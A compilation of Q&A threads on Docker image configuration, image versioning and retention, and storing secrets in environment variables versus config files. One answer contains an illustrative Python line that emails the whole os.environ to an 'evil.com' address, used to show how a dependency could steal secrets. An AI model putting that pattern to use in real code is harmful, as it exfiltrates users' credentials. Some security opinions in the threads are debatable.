Creating a Docker UAT/Production image

Just a quick question about best practices for creating Docker images for critical environments. As we know, in the real world the team/company deploying to internal test is often not the same as the one deploying to client test environments and production. A problem arises because all the app configuration info may not be available when the Docker UAT/production image is created, e.g. with Jenkins. And then there is the question of passwords that are stored in app configuration.
So my question is, how "fully configured" should the Docker image be? The way I see it, it is in practice not possible to fully configure the Docker image, but some app passwords etc. must be left out. But then again this slightly defies the purpose of a Docker image?

how "fully configured" should the Docker image be? The way I see it, it is in practice not possible to fully configure the Docker image, but some app passwords etc. must be left out. But then again this slightly defies the purpose of a Docker image?
There will always be tradeoffs between convenience, security, and flexibility.
An image that works with zero runtime configuration is very convenient to run, but it is not very flexible, and sensitive config like passwords ends up baked in and exposed.
An image that takes all configuration at runtime is very flexible and doesn't expose sensitive info, but it can be inconvenient to use if default values aren't provided. If a user doesn't know some values, they may not be able to use the image at all.
Sensitive info like passwords usually lands on the runtime side when deciding what configuration to bake into images and what to require at runtime. However, this isn't always the case. As an example, you may want to build test images with zero runtime configuration that only point to test environments. Everyone has access to test environment credentials anyway, zero configuration is more convenient for testers, and no one can accidentally run a build against the wrong database.
For configuration other than credentials (e.g. app properties, log level, log file location), the organizational structure and team dynamics may dictate how much configuration you bake in. In a devops environment, making changes and building a new image may be painless; in that case it makes sense to bake in as much configuration as you want. If ops and development are separate, it may take days to make minor changes to the image; in that case it makes sense to allow more runtime configuration.
Back to the original question, I'm personally in favor of choosing reasonable defaults for everything except credentials and allowing runtime overrides only as needed (convention with reluctant configuration). Runtime configuration is convenient for ops, but it can make tracking down issues difficult for the development team.
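A minimal Python sketch of that "convention with reluctant configuration" approach, assuming hypothetical setting names (LOG_LEVEL, DB_HOST, DB_PASSWORD): everything gets a reasonable default that can be overridden at runtime, while credentials have no default and must be supplied.

```python
import os

# Hypothetical defaults baked into the image; any of them can be
# overridden with an environment variable at container start.
DEFAULTS = {
    "LOG_LEVEL": "INFO",
    "LOG_FILE": "/var/log/app/app.log",
    "DB_HOST": "db",
}

def load_config(environ=None):
    environ = os.environ if environ is None else environ
    # Non-sensitive settings: default unless overridden at runtime.
    config = {key: environ.get(key, default) for key, default in DEFAULTS.items()}
    # Credentials have no baked-in default: fail fast if missing.
    try:
        config["DB_PASSWORD"] = environ["DB_PASSWORD"]
    except KeyError:
        raise RuntimeError("DB_PASSWORD must be provided at runtime") from None
    return config
```

Failing fast on a missing credential also gives ops an immediate, explicit error instead of a connection failure buried in logs later.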

Related

Growing local development environment issues

Where I work we've been adding microservices for different purposes, and the local development environment is becoming difficult to set up. Services have too many environment variables to configure, and usually there's not enough memory available to run them all.
We plan to fix these issues. I understand it's mostly a matter of architecture and DevOps. One option we've considered is to create a proper service registry that allows easier setup and opens the door to, for example, having some services run locally and others in the cloud, all wired together through the service registry.
Another option could be to stub some of the dependencies with something like https://wiremock.org/, but that seems too limited and difficult (?).
I wanted to ask, what other strategies are there to manage growing development environments?

Are there problems with using a big Docker container for multiple tasks?

I'm working on a scientific computing project. For this work I need many Python modules as well as C++ packages. The C++ packages require specific versions of other software, so setting up the environment must be done carefully, and after the setup the dependencies should not be updated. So I thought it would be good to make a Docker container and work inside it, in order to make the work reproducible in the future. However, I don't understand why people on the internet recommend using different Docker containers for different processes. To me it seems more natural to set up the environment, which is a pain, and then use it for the entire project. Can you please explain what I should be worried about in this case?
It's important that you differentiate between a Docker image and a Docker container.
People recommend using one process per container because this results in a more flexible, scalable environment: if you need to scale out your frontend web servers, or upgrade your database, you can do that without bringing down your entire stack. Running a single process per container also allows Docker to manage those processes in a sane fashion, e.g. by restarting things that have unexpectedly failed. If you're running multiple processes in a container, you end up having to hide this information from Docker by running some sort of process manager, which complicates your containers and can make it difficult to orchestrate a complex application.
On the other hand, it's quite common to use a single image as the basis for a variety of containers all running different services. This is particularly true if you're building a project where a single source tree produces several commands; in that case, it makes sense to bundle all of that into a single image and then choose which command to run when you start the container.
This only becomes a problem when someone decides to bundle, say, MySQL and Apache into a single image. That's a problem because well-maintained official images already exist for those projects, and by building your own you've taken on the burden of properly configuring those services and maintaining the images going forward.
To summarize:
One process/service per container tends to make your life easier
Bundling things together in a single image can be okay

What's the process of storing config for 12 factor app?

So I have been building my application mostly as a 12-factor app, and I'm now looking at the config part.
Right now, as it stands, I have separate config files for dev and production, and through the build process we build either a dev or a production image. The code is 100% the same; the only thing that changes is the config.
Now, I 100% understand that in a 12-factor app the config should come from an external source such as environment variables, or maybe a safe store like Vault, etc.
What the various articles and blogs fail to mention is how the config is stored and processed. If the code is separated into its own git repo and no config is stored with it, then how do we handle the config?
Do we store the actual config values in a separate git repo and then somehow merge/push/execute those on the target environment (Kubernetes ConfigMap, Marathon JSON config, Vault, etc.) through the build process using some kind of trigger?
There is no standard, but I've observed some common behaviors:
Sensitive information never goes into the version control system, especially Git, which is a DVCS (the repo can be cloned to other locations). If you're not convinced, remember that our current "security model" rests on encrypted data being infeasible to read within a certain time; at some point the info may become readable. On Kubernetes I usually see operators managing a service account across multiple namespaces while other resources only reference that service account; tools like KMS, cert-manager, Vault, etc. are welcome.
Configuration such as env vars and endpoints is stored and versioned with its own lifecycle.
Twelve-factor does not tell you to separate your app's configuration from its repository; rather, it suggests not baking the configuration into the app itself (e.g. into your container or even your binary distribution).
In fact, if you want to use a separate repo just for config, you can; and if you want to keep the configuration alongside your project source code, you can do that as well. It is more a decision based on the size of the project, its complexity, segregation of duties, and team context. (IMHO)
In my case, for instance, it makes sense to keep config in a dedicated repository: the production environment has more than 50 clusters, each with its own isolation stack, and different teams manage their own services while sharing common backing services (DB, API, streams...). In my opinion, as things become more complex and cross-shared, it makes more sense to keep config in an independent repository, since several teams and resources span multiple clusters.
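As a sketch of the pattern of versioned non-sensitive config plus runtime-supplied secrets (all names here are assumptions for illustration): defaults live in a config file committed with the code, the environment overrides them, and secrets come only from the environment.

```python
import json

def load_settings(config_json, environ):
    """Merge versioned, non-sensitive defaults with runtime overrides;
    secrets come from the environment only, never from the repo."""
    settings = json.loads(config_json)                # versioned with the code
    for key in list(settings):
        if key in environ:                            # runtime override wins
            settings[key] = environ[key]
    settings["DB_PASSWORD"] = environ["DB_PASSWORD"]  # supplied at deploy time
    return settings
```

The same image can then be promoted from dev to production unchanged, with only the injected environment differing per cluster.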

Managing Docker images over time

Folks that are building Docker images on push - how do you manage the different versions over time?
Do they all get their own tag? Do you tag based on the git hash?
Do you delete old images after some time? Don't they take up a lot of space (1GB+) each?
how do you manage the different versions over time?
The first thing to note is that tags can't be trusted over time. They are not guaranteed to refer to the same thing or to continue to exist, so use Dockerfile LABELs, which remain consistent and are always stored with the image. label-schema.org is a good starting point.
Do they all get their own tag? Do you tag based on the git hash?
If you need something unique to refer to every build, just use the image's sha256 sum. If you want to attach extra build metadata to an image, use a LABEL as previously mentioned and include the git hash and whatever versioning scheme you want. If using the sha256 sum sounds unwieldy, note that tags are still needed to refer to individual image releases, so you will need some scheme anyway.
Git tags, datetimes, and build numbers all work. Each has its pros and cons depending on your environment and what you are trying to tie together as a "release". It's worth noting that a Docker image may come from a Dockerfile at a given git hash, but building from that git hash will not produce a consistent image over time if you source an image FROM elsewhere.
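As an illustration of one such scheme (the tag format here is an assumption, not a Docker standard), a small helper that composes a human-readable release tag from a semver string and a git hash:

```python
import re

def build_tag(version, git_hash, short=7):
    """Compose an image tag like '1.4.2-gitabc1234' for use with
    `docker tag`; the format is an illustrative convention only."""
    if not re.fullmatch(r"\d+\.\d+\.\d+", version):
        raise ValueError("expected a semver-style version like 1.4.2")
    # Shorten the hash the way `git rev-parse --short` does by default.
    return f"{version}-git{git_hash[:short]}"
```

Keeping the full hash in a LABEL while putting only the short form in the tag keeps tags readable without losing traceability.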
Do you delete old images after some time?
Retention depends entirely on your software's, systems', and company's requirements or policies. I've seen environments where audit requirements were high, which increases build/release retention time, down to the "I want to re-run these tests on this build" level. Other environments have minimal audit requirements, which tends to lower retention. Some places don't even try to impose any release management at all (this is bad). This can't really be answered by someone out here for your specific environment, though there are minimums that would be a good idea to stick to.
The base requirement is having an artefact stored for each production release. This is generally "forever" for historical purposes. Actively looking back more than a release or two is pretty rare (again, this can depend on your app), so archival is a good idea and easy to do with a second registry on cheap storage/hosting that receives a copy of everything (i.e. not on your precious SSDs).
I've never seen a requirement to keep all development builds over time. Retention generally follows your development/release cycle. It's rare to need access to dev builds outside your current release plus the next one. Just remember to LABEL and tag dev builds appropriately so cleanup is simple: -dev, -snapshot, -alpha.0, whatever.
Don't they take up a lot of space (1GB+) each?
It's normally less than you think, but yes, images can be large, because on top of your application you have an OS image. That's why lots of people start with Alpine: it's tiny compared to most distros, as long as you don't have anything incompatible with musl libc.

Is it secure to store passwords as environment variables (rather than as plain text) in config files?

I work on a few apps in rails, django (and a little bit of php), and one of the things that I started doing in some of them is storing database and other passwords as environment variables rather than plain text in certain config files (or in settings.py, for django apps).
In discussing this with one of my collaborators, he suggested this is a poor practice - that perhaps this isn't as perfectly secure as it might at first seem.
So, I would like to know - is this a secure practice? Is it more secure to store passwords as plain text in these files (making sure, of course, not to leave these files in public repos or anything)?
As mentioned before, neither method provides any additional layer of "security" once your system is compromised. I believe one of the strongest reasons to favor environment variables is version control: I've seen way too many database configurations etc. accidentally stored in a version control system like Git for every other developer to see (and whoops! it happened to me as well...).
Not storing your passwords in files makes it impossible for them to end up in the version control system.
On a more theoretical level, I tend to think about levels of security in the following way (in order of increasing strength):
No security. Plain text. Anyone who knows where to look can access the data.
Security by obfuscation. You store the data (plaintext) someplace tricky, like an environment variable, or in a file that is meant to look like a configuration file. An attacker will eventually figure out what's going on or stumble across it.
Security provided by encryption that is trivial to break (think Caesar cipher!).
Security provided by encryption that can be broken with some effort.
Security provided by encryption that can be broken with some effort.
Security provided by encryption that is impractical to break given current hardware.
The most secure system is one that nobody can use! :)
Environment variables are more secure than plaintext files because they are volatile/disposable, not saved; i.e. if you set only a local environment variable, like "set pwd=whatever", and then run the script with something that exits your command shell at the end of the script, the variable no longer exists afterwards.
Your case falls into the first two, which I'd say is fairly insecure. If you were going to do this, I wouldn't recommend deploying outside your immediate intranet/home network, and then only for testing purposes.
Anytime you have to store a password, it is insecure. Period. There's no way to store an unencrypted password securely. Which of environment variables vs. config files is more "secure" is perhaps debatable; IMHO, if your system is compromised, it doesn't really matter where the password is stored: a diligent hacker can track it down.
Sorry, I didn't have enough rep to comment, but I also wanted to add that if you're not careful, your shell might capture that password in its command history as well. So running something like $ pwd=mypassword my_prog manually isn't as ephemeral as you might have hoped.
I think when possible you should store your credentials in a gitignored file and not as environment variables.
One thing to consider when storing credentials in ENV (environment) variables vs. a file is that ENV variables can very easily be inspected by any library or dependency you use.
This can be done maliciously or not. For example, a library author could email stack traces plus the ENV variables to themselves for debugging (not best practice, but possible).
If your credentials are in a file, then peeking into them is much harder.
Specifically, think about an npm package in Node. For an npm package to look at your credentials in the ENV is a simple matter of process.env. If, on the other hand, they are in a file, it's a lot more work.
Whether your credentials file is version controlled or not is a separate question. Not version controlling your credentials file exposes it to fewer people; there's no need for all devs to know the production credentials. Since this follows the principle of least privilege, I would suggest git-ignoring your credentials file.
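The same point in Python terms: reading the entire environment takes one expression, with no path to know and no file permissions to satisfy. The function below is a hypothetical stand-in for a nosy dependency, not any real library's behavior.

```python
import os

def snoop_environment(environ=None):
    """All it takes for any imported dependency to copy every env var,
    secrets included; contrast with needing a known path plus read
    permission to open a credentials file."""
    return dict(os.environ if environ is None else environ)
```

A dependency deep in your tree can run this at import time without your code ever passing it anything.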
It depends on your threat model.
Are you trying to prevent your users from sprinkling passwords all over their file systems, where they are likely to be forgotten and mishandled? If so, then yes, because environment variables are less persistent than files.
Are you trying to secure against something malicious that directly targets your program? If so, then no, because environment variables do not have the same level of access control that files do.
Personally, I think that negligent users are more common than motivated adversaries, so I'd go with the environment variable approach.
Among other concerns, one issue with using environment variables to store secrets is that they can be leaked unintentionally:
Messy code displaying raw error messages with context (env vars) to a user
Monitoring tool capturing the error and context and sending/storing it for future investigation
Developer logging environment variables which persists them to disk (and potentially to some log processing tool e.g. Logstash)
Compromised dependency sending all of the global variables it can reach, including env vars to the attacker
Setting the env variable leaves traces in the shell history
Potential issues with secrets stored in config files:
Misconfigured file permissions allowing access to a random OS user
Developer adding config files to version control
Intentionally (not knowing it's bad)
By accident. Even when the file is removed (during a PR review, maybe), if not done properly it may still live in the Git commit history.
Regardless of how you store secrets, if your system is compromised you're screwed. Extracting them is just a matter of time and effort.
So what can we do to minimize the risks?
Don't store/pass around secrets in plain text.
One way to approach the problem is to use an external (managed or self-hosted) secrets storage solution (e.g. AWS Parameter Store, Azure Key Vault, HashiCorp Vault) and fetch sensitive data at runtime (possibly caching it in memory). This way your secrets are encrypted in transit and at rest.
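A minimal sketch of the fetch-at-runtime-with-caching idea. The `fetch` callable is a hypothetical stand-in for a real backend client (for example a Vault or Parameter Store call); the class and its names are assumptions, not any library's API.

```python
import time

class SecretCache:
    """Fetch secrets at runtime and cache them in memory for a TTL,
    so the secret never touches disk and the backend isn't hit on
    every request."""

    def __init__(self, fetch, ttl_seconds=300):
        self._fetch = fetch          # callable(name) -> secret value
        self._ttl = ttl_seconds
        self._cache = {}             # name -> (value, fetched_at)

    def get(self, name):
        entry = self._cache.get(name)
        if entry is not None and time.monotonic() - entry[1] < self._ttl:
            return entry[0]          # still fresh: no backend call
        value = self._fetch(name)    # a network call in real deployments
        self._cache[name] = (value, time.monotonic())
        return value
```

The TTL bounds how stale a rotated secret can be while keeping backend traffic low.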
AFAICT, there are two reasons people recommend storing secrets in environment variables:
It's too easy to inadvertently commit secret flat files to a repo. (And if it's a public repo, you're toast.)
It prevents password clutter: having the same key in many different project directory files is itself a security risk, since developers will eventually lose track of where secrets are located.
These two issues can be solved in better ways. The first should be solved by a git commit hook that checks for things that look like passwords (e.g., gitleaks). I wish Linus had built such a tool into git's source code but, alas, that didn't happen. (Needless to say, secret files should always be added to .gitignore, but you need a hook in case someone forgets.)
The second can be solved by having a global company secrets file, ideally stored on a read-only shared drive. So, in Python, you could have something like from company_secrets import *.
More importantly, as pointed out by others, it's way too easy to exfiltrate secrets stored in environment variables. For example, in Python, a library author could insert send_email(address="evil.person@evil.com", text=json.dumps(os.environ)) and then you're toast if you execute this code. Hacking is much more challenging if you have a file on your system called ~/secret_company_stuff/.my_very_secret_company_stuff.
Django users only:
Django (in DEBUG mode) shows the raw value of an environment variable in the browser if there is an exception. This seems highly insecure if, for example, a developer accidentally sets DEBUG=True in production. In contrast, Django DOES obfuscate password-like settings variables by looking for the strings API, TOKEN, KEY, SECRET, PASS or SIGNATURE in the variable names in the framework's settings.py.
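For illustration, that cleansing behavior can be approximated in a few lines. This is a rough imitation using the substrings named above, not Django's actual implementation:

```python
import re

# Substrings that flag a setting name as sensitive (per the Django
# behavior described above).
HIDDEN_SETTINGS = re.compile(r"API|TOKEN|KEY|SECRET|PASS|SIGNATURE",
                             re.IGNORECASE)

def cleanse_settings(settings):
    """Replace values of password-like settings before displaying them
    in an error page or debug report."""
    return {name: "********" if HIDDEN_SETTINGS.search(name) else value
            for name, value in settings.items()}
```

Note that this only protects named settings; a raw dump of os.environ in a stack trace would still bypass it.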
